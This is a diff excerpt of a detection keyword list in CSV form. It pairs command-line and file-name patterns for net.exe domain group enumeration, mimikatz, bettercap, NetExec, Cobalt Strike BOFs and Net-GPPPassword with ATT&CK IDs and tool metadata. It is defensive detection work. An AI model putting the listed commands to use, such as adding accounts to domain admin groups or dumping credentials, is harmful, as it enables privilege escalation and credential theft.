+"*net view /all /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net* group Administrator* /add /domain*","greyware_tool_keyword","net","adding a user to a privileged group. 
This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.","T1098","TA0003","N/A","N/A","Persistence","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*net.exe* group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Print Operators* /domain*","greyware_tool_keyword","net","display 
all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.exe* group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net.fuzz *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*net.fuzz.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*net.probe on","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*net.probe on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*net.sniff *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*net.sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*net::alias*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::deleg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::group*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::if*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::serverinfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::session*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::share*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::stats*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::tod*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::user*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net::wsession*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*net_dclist *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*net_localgroup_member -Group*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 
- TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*net_portscan.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
+"*net_recon.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*net1 group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - 
T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1 localgroup admin*","greyware_tool_keyword","net","showing users in a privileged group. 
","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - 
TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*net1.exe* group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*netCat*","greyware_tool_keyword","netcat","Netcat is a featured networking utility which reads and writes data across network connections","T1043 - T1052 - T1071 - T1095 - T1132 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","http://netcat.sourceforge.net/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. 
Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","0","N/A","N/A","10","1562","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z"
+"*netdiscover -i * -r */24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*netero1010/Quser-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" 
+"*netero1010/ScheduleRunner*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z"
+"*netero1010/ServiceMove-BOF*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z"
+"*NetExec ldap * --*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*NetExec ldap * --dc-ip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*NetExec ldap * -M enum_trusts*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*NetExec winrm *--*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - 
TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*Net-GPPPassword.cs*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z"
+"*Net-GPPPassword.exe*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z"
